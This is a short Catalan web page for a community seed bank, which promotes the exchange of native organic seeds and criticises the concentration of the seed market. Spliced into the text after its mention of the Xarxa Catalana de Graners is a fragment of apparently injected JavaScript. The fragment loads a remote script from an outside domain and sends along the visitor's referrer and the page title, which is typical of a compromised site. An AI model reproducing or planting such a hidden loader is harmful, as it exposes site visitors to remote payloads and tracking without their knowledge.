Banc de Llavors

Al Banc de Llavors practiquem l’intercanvi de llavors autòctones i ecològiques amb l’objectiu de preservar la biodiversitat local. La recuperació i multiplicació de llavors a petita escala, tal i com s’ha fet tradicionalment, ens dona autonomia davant les polítiques monopolístiques insostenibles de les grans multinacionals de la llavor, com Montsanto o Syngenta. Fa només tres dècades, existien més de 7 mil empreses de llavors, cap de les quals arribava a 0,5 per cent del mercat mundial, l’any 2005 .  la meitat del mercat mundial de llavors estava en mans de només deu empreses. No podem acceptar que les llavors, que son la base de la vida, siguin acaparades pels mateixos responsables de la contaminació transgènica i la pèrdua d’agrodiversitat.

Si vols llavors, pregunta a la barra tots els diumenges que obre el PIC. Practiquem la donació però també busquem l’intercanvi. Si propagues les nostres llavors o altres, portan-se’n també!

El Banc de Llavors col.labora amb la Xarxa Catalana de Graners.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

subscriu-te al PIC